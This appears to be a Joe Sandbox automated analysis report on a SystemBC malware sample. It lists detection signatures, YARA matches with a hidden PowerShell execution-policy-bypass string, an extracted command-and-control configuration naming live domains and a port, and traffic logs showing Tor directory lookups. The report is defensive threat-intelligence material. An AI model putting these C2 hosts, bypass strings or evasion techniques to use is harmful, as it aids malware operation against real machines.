Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p9CvI6kq7d.exe

Overview

General Information

Sample Name:p9CvI6kq7d.exe
Analysis ID:764865
MD5:0f6f452ee406b3360e39819aac42a200
SHA1:e62b9163c2eddbc8bdf262faf11ac1f5f1e25683
SHA256:76bd9bebdadfeda8974424b76d669a8f22b4a1178b1a9caae0d2c5a60c9db5e9
Tags:exeSystemBC
Infos:

Detection

SystemBC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Yara detected SystemBC
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
May check the online IP address of the machine
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May use the Tor software to hide its network traffic
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Creates job files (autostart)
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
AV process strings found (often used to terminate AV products)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • p9CvI6kq7d.exe (PID: 3184 cmdline: C:\Users\user\Desktop\p9CvI6kq7d.exe MD5: 0F6F452EE406B3360E39819AAC42A200)
  • orvsmwx.exe (PID: 6072 cmdline: C:\ProgramData\prfxiau\orvsmwx.exe start MD5: 0F6F452EE406B3360E39819AAC42A200)
  • cleanup
{"HOST1": "asdasd08.com", "HOST2": "asdasd08.xyz", "PORT1": "4039"}
SourceRuleDescriptionAuthorStrings
00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SystemBCYara detected SystemBCJoe Security
    00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_EXEPWSH_DLAgentDetects SystemBCditekSHen
    • 0x75b1:$pwsh: powershell
    • 0x7912:$s1: GET %s HTTP/1
    • 0x792d:$s2: User-Agent:
    • 0x75bc:$s3: -WindowStyle Hidden -ep bypass -file "
    • 0x76b1:$s4: LdrLoadDll
    • 0x752b:$v6: start
    00000000.00000002.245017062.0000000000546000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1258:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_SystemBCYara detected SystemBCJoe Security
      00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      0.3.p9CvI6kq7d.exe.680000.0.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
        0.3.p9CvI6kq7d.exe.680000.0.raw.unpackMALWARE_Win_EXEPWSH_DLAgentDetects SystemBCditekSHen
        • 0x75b1:$pwsh: powershell
        • 0x7912:$s1: GET %s HTTP/1
        • 0x792d:$s2: User-Agent:
        • 0x75bc:$s3: -WindowStyle Hidden -ep bypass -file "
        • 0x76b1:$s4: LdrLoadDll
        • 0x752b:$v6: start
        0.2.p9CvI6kq7d.exe.400000.0.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
          0.2.p9CvI6kq7d.exe.400000.0.unpackMALWARE_Win_EXEPWSH_DLAgentDetects SystemBCditekSHen
          • 0x75b1:$pwsh: powershell
          • 0x7912:$s1: GET %s HTTP/1
          • 0x792d:$s2: User-Agent:
          • 0x75bc:$s3: -WindowStyle Hidden -ep bypass -file "
          • 0x76b1:$s4: LdrLoadDll
          • 0x752b:$v6: start
          0.2.p9CvI6kq7d.exe.670e50.1.raw.unpackJoeSecurity_SystemBCYara detected SystemBCJoe Security
            Click to see the 5 entries
            No Sigma rule has matched
            Timestamp:192.168.2.38.8.8.859869532031427 12/11/22-09:25:03.649156
            SID:2031427
            Source Port:59869
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.860625532031427 12/11/22-09:26:31.319789
            SID:2031427
            Source Port:60625
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857990532031427 12/11/22-09:25:50.584799
            SID:2031427
            Source Port:57990
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.851139532031427 12/11/22-09:26:46.160582
            SID:2031427
            Source Port:51139
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: p9CvI6kq7d.exeVirustotal: Detection: 80%Perma Link
            Source: p9CvI6kq7d.exeReversingLabs: Detection: 88%
            Source: p9CvI6kq7d.exeAvira: detected
            Source: asdasd08.comAvira URL Cloud: Label: malware
            Source: http://193.23.244.244/tor/status-vote/current/consensusAvira URL Cloud: Label: malware
            Source: asdasd08.xyzAvira URL Cloud: Label: malware
            Source: http://86.59.21.38/tor/status-vote/current/consensusAvira URL Cloud: Label: malware
            Source: http://131.188.40.189/tor/status-vote/current/consensusAvira URL Cloud: Label: malware
            Source: asdasd08.xyzVirustotal: Detection: 12%Perma Link
            Source: asdasd08.comVirustotal: Detection: 11%Perma Link
            Source: C:\ProgramData\prfxiau\orvsmwx.exeAvira: detection malicious, Label: HEUR/AGEN.1209913
            Source: C:\ProgramData\prfxiau\orvsmwx.exeReversingLabs: Detection: 88%
            Source: p9CvI6kq7d.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\prfxiau\orvsmwx.exeJoe Sandbox ML: detected
            Source: 0.2.p9CvI6kq7d.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 1.3.orvsmwx.exe.590000.0.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 0.2.p9CvI6kq7d.exe.400000.0.unpackMalware Configuration Extractor: SystemBC {"HOST1": "asdasd08.com", "HOST2": "asdasd08.xyz", "PORT1": "4039"}
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00403B56 CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,0_2_00403B56
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00404065 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00404065
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00401168 CryptAcquireContextA,CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,0_2_00401168
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00401D6D CryptReleaseContext,0_2_00401D6D
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00403E30 CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_00403E30
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00404484 QueryContextAttributesA,VirtualAlloc,EncryptMessage,0_2_00404484
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_004045B9 VirtualAlloc,DecryptMessage,0_2_004045B9
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_006742B5 CryptStringToBinaryA,0_2_006742B5
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00673DA6 CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,0_2_00673DA6
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00671FBD CryptReleaseContext,0_2_00671FBD
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_006713B8 CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,0_2_006713B8
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: -----BEGIN RSA PUBLIC KEY-----0_2_00404065
            Source: p9CvI6kq7d.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----

            Compliance

            barindex
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeUnpacked PE file: 0.2.p9CvI6kq7d.exe.400000.0.unpack
            Source: p9CvI6kq7d.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49756 version: TLS 1.2

            Networking

            barindex
            Source: TrafficSnort IDS: 2031427 ET TROJAN Observed SystemBC CnC Domain in DNS Query 192.168.2.3:59869 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2031427 ET TROJAN Observed SystemBC CnC Domain in DNS Query 192.168.2.3:57990 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2031427 ET TROJAN Observed SystemBC CnC Domain in DNS Query 192.168.2.3:60625 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2031427 ET TROJAN Observed SystemBC CnC Domain in DNS Query 192.168.2.3:51139 -> 8.8.8.8:53
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 9031 -> 49753
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: asdasd08.xyz
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: asdasd08.xyz
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: asdasd08.xyz
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: asdasd08.xyz
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: C:\ProgramData\prfxiau\orvsmwx.exeDNS query: name: api.ipify.org
            Source: Malware configuration extractorURLs: asdasd08.com
            Source: Malware configuration extractorURLs: asdasd08.xyz
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewIP Address: 86.59.21.38 86.59.21.38
            Source: Joe Sandbox ViewIP Address: 86.59.21.38 86.59.21.38
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: ip4.seeip.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/aacd4e09e65ba18caf35fbc855ef659505b36e9e HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/5d5ddff29b96cc566aa746636868eb07f97de60c HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 193.23.244.244User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/742091486d04734c57d97bcefb53d22ed0b77881 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
